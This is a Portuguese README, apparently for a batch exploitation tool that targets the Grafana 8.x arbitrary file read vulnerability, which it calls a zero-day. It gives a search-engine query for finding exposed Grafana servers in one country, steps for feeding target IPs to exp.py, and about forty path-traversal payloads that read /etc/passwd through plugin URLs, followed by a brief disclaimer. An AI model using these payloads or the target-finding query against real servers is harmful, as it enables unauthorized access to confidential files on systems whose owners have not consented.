
Ferramenta de detecção em lote para vulnerabilidade de leitura arbitrária de arquivos na versão Grafanav8.*: Esta vulnerabilidade é atualmente uma vulnerabilidade de dia zero (0day). Atacantes não autorizados podem explorar esta vulnerabilidade para obter arquivos confidenciais do servidor.
Grafana é um pacote de análise e visualização de código aberto. Frequentemente utilizado como infraestrutura para visualização de séries temporais e análise de aplicações, também é amplamente utilizado em outras áreas, incluindo sensores industriais, automação residencial, clima e controle de processos. Existe uma vulnerabilidade de leitura arbitrária de arquivos na versão 8.*, que atualmente é uma vulnerabilidade de dia zero. Atacantes não autenticados podem explorar essa vulnerabilidade para obter arquivos sensíveis do servidor.
app="Grafana" && country="CN" && body="v8."
1. Coloque os endereços IP a serem verificados no arquivo ip.txt
2. Execute python3 exp.py
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd
Esta ferramenta é fornecida apenas para que testadores de segurança realizem auto-verificação. O autor não se responsabiliza por quaisquer consequências decorrentes do uso indevido pelos usuários. Os usuários devem cumprir as leis locais. Este programa não pode ser usado para fins comerciais, apenas para aprendizado e troca.
